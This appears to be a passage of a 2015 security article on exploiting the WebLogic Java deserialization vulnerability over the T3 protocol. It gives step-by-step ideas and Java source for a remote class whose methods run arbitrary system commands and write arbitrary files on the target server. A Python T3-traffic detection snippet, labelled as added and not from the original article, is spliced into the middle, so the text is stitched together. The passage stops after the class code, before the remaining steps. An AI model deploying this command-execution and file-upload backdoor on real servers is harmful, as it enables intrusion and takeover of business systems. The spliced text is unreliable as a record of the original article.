Java deserialization vulnerability: implementing local exploitation of WebLogic

ID MYHACK58:62201570321
Type myhack58
Reporter rebeyond
Modified 2015-12-24T00:00:00


WebLogic is widely used domestically and supports the core business of many companies, so I had not published a WebLogic exploitation tool. Recently, however, many friends on the client side (Party A) have asked me whether I have a convenient tool for checking the WebLogic instances deployed on their companies' networks. The vulnerability has been public for so long that maintenance staff are aware of its danger; the detection methods published online are just not easy to use and make testing troublesome, hence this article.

0x01 Ideas

Because WebLogic prints exceptions directly to the server console, the method of echoing output by wrapping it in an exception, which works on JBoss, does not apply to WebLogic (see the other article: "Java deserialization vulnerability: implementing command-execution echo and exploit"). But WebLogic offers a more convenient way. WebLogic transports serialized classes over the T3 protocol, so the exploit can communicate with the server over T3. Because the WebLogic T3 protocol and the web protocol share the same port, anything that can reach WebLogic can use it. No remote class needs to be loaded, so the server is not required to be able to connect to the external network.

The T3 protocol is not described in detail here. If the reader is not familiar with it, it is enough to know that the T3 protocol allows a client to remotely invoke classes on the server side. So we organize our thoughts as follows:

(1) First, create locally a class that can be used for our remote calls, and compile it.
(2) Upload the compiled class to the server.
(3) Register and bind our uploaded class on the remote server.
(4) Invoke our class remotely from the local machine to execute the command we want to run.
(5) When execution is complete, unregister the remote class.
(6) Delete the class file.
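A defender-side check for the point above that T3 and HTTP share one listener: this added example (not from the original article) labels a flow by its first client bytes and counts Java serialization stream headers, flagging T3 that arrives from outside a trusted subnet. The T3 greeting format, the sample payloads, the addresses and `TRUSTED_NETS` are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumption: a T3 client opens with an ASCII line "t3 <version>" (or "t3s ..."),
# while a web client on the same listener opens with an HTTP request line.
T3_HELLO = re.compile(rb"^t3s? \d+(\.\d+)*\n")
HTTP_REQUEST = re.compile(rb"^(GET|POST|HEAD|PUT|DELETE|OPTIONS) \S+ HTTP/1\.[01]\r?\n")
STREAM_MAGIC = b"\xac\xed\x00\x05"  # Java serialization stream header


def classify_first_bytes(data: bytes) -> str:
    """Label a connection by the first client-to-server bytes."""
    if T3_HELLO.match(data):
        return "t3"
    if HTTP_REQUEST.match(data):
        return "http"
    return "other"


def serialized_object_offsets(data: bytes) -> list:
    """Offsets of every Java serialization stream header in the payload."""
    offsets, start = [], 0
    while (hit := data.find(STREAM_MAGIC, start)) != -1:
        offsets.append(hit)
        start = hit + len(STREAM_MAGIC)
    return offsets


def review_flow(src_ip: str, chunks: list, trusted_nets: list) -> dict:
    """Summarize one flow; alert on T3 from outside the trusted networks."""
    proto = classify_first_bytes(chunks[0]) if chunks else "other"
    objects = serialized_object_offsets(b"".join(chunks))
    addr = ipaddress.ip_address(src_ip)
    trusted = any(addr in ipaddress.ip_network(n) for n in trusted_nets)
    return {"src": src_ip, "protocol": proto,
            "serialized_objects": len(objects),
            "alert": proto == "t3" and not trusted}


# Constructed sample flows (client-to-server payloads only), not real captures.
SAMPLE_FLOWS = [
    ("10.0.5.20", [b"t3 12.2.1\nAS:255\nHL:19\n\n", b"\x00\x00\x01\x00" + STREAM_MAGIC + b"sr"]),
    ("203.0.113.7", [b"t3 12.2.1\nAS:255\nHL:19\n\n", b"\x00" + STREAM_MAGIC + b"sr\x00" + STREAM_MAGIC]),
    ("203.0.113.7", [b"GET /index.jsp HTTP/1.1\r\nHost: app\r\n\r\n"]),
]
TRUSTED_NETS = ["10.0.5.0/24"]  # hypothetical admin/cluster subnet

if __name__ == "__main__":
    for src, chunks in SAMPLE_FLOWS:
        print(review_flow(src, chunks, TRUSTED_NETS))
```

Because the web traffic and T3 arrive on the same port, a port-based rule cannot separate them; the classification has to look at the first bytes of each connection.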
0x02

(1) Create our remote class. The class implements two methods: one executes a system command and returns its output, the other uploads a text file. The class must inherit from the java.rmi.Remote interface. The code is as follows:

Interface:

    public interface InitApp extends java.rmi.Remote {
        String runCmd(String cmd);
        String putFile(String Content, String Path);
    }

Implementation class:

    import java.io.BufferedReader;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.InputStreamReader;
    import java.rmi.RemoteException;
    import javax.naming.Context;
    import javax.naming.InitialContext;

    public class InitAppImpl implements InitApp {
        private String name;

        public InitAppImpl(String s) throws RemoteException {
            super();
            name = s;
        }

        /**
         * Returns a string.
         *
         * @return results of cmd
         */
        public String runCmd(String cmd) {
            try {
                Process proc = Runtime.getRuntime().exec(cmd);
                BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
                StringBuffer sb = new StringBuffer();
                String line;
                while ((line = br.readLine()) != null) {
                    sb.append(line).append("\n");
                }
                return sb.toString();
            } catch (Exception e) {
                return e.getMessage();
            }
        }

        public String putFile(String Content, String Path) {
            try {
                FileOutputStream fo = new FileOutputStream(Path);
                fo.write(Content.getBytes());
                fo.close();
                File f = new File(Path);
                if (f.exists()) {
                    return Path + "upload success! Has been verified to exist.";
                } else {
                    return Path + "upload success!";
                }
            } catch (Exception e) {
                return e.getMessage();
            }
        }

        // Binds an instance of this class into JNDI under the name "RemoteClass".
        public static void main(String args[]) throws Exception {
            try {
                InitAppImpl obj = new InitAppImpl("RemoteClass");
                Context ctx = new InitialContext();
                ctx.bind("RemoteClass", obj);
            } catch (Exception e) {
                System.err.println("RemoteClass: an exception occurred:");
            }
        }
    }
